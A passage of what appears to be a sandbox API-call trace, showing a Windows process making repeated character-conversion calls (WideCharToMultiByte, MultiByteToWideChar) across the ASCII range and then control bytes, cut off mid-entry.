[0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="B", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="BB", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="CC", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="D", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="DD", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="E", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="EE", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="FF", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="GG", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="H", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="HH", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="II", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="JJ", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="K", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="KK", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="L", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="LL", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="M", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="MM", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="NN", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="OO", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="PP", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="QQ", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="RR", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="SS", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="TT", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="UU", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="VV", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="WW", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="XX", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="YY", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="ZZ", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="[[", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\\\\", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="]", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="]]", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="^", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="^^", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="__", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="``", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="aa", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="bb", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="cc", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="dd", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="ee", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="ff", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="gg", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="hh", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="ii", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="j", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="jj", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="kk", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="ll", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="mm", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="nn", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.707] ___lc_codepage_func () returned 0x0 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="oo", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="pp", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="qq", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="rr", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="ss", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="tt", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="uu", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="vv", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="ww", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="xx", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="yy", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="zz", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="{{", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="||", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="}}", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="~", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="~~", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x7f\x7f", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x01←K☈`ﶸ)ნK\x01") returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x02←K☈`ﶸ)ნK\x02") returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x03←K☈`ﶸ)ნK\x03") returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x04←K☈`ﶸ)ნK\x04") returned 1 [0089.708] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x05←K☈`ﶸ)ნK\x05") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x06←K☈`ﶸ)ნK\x06") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x07←K☈`ﶸ)ნK\x07") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x08←K☈`ﶸ)ნK\x08") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x09←K☈`ﶸ)ნK\x09") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\n←K☈`ﶸ)ნK\n") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x0b←K☈`ﶸ)ნK\x0b") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x0c←K☈`ﶸ)ნK\x0c") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\r←K☈`ﶸ)ნK\r") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x0e←K☈`ﶸ)ნK\x0e") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x0f←K☈`ﶸ)ნK\x0f") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x10←K☈`ﶸ)ნK\x10") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x11←K☈`ﶸ)ნK\x11") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x12←K☈`ﶸ)ნK\x12") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x13←K☈`ﶸ)ნK\x13") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x14←K☈`ﶸ)ნK\x14") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x15←K☈`ﶸ)ნK\x15") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x16←K☈`ﶸ)ნK\x16") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x17←K☈`ﶸ)ნK\x17") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: 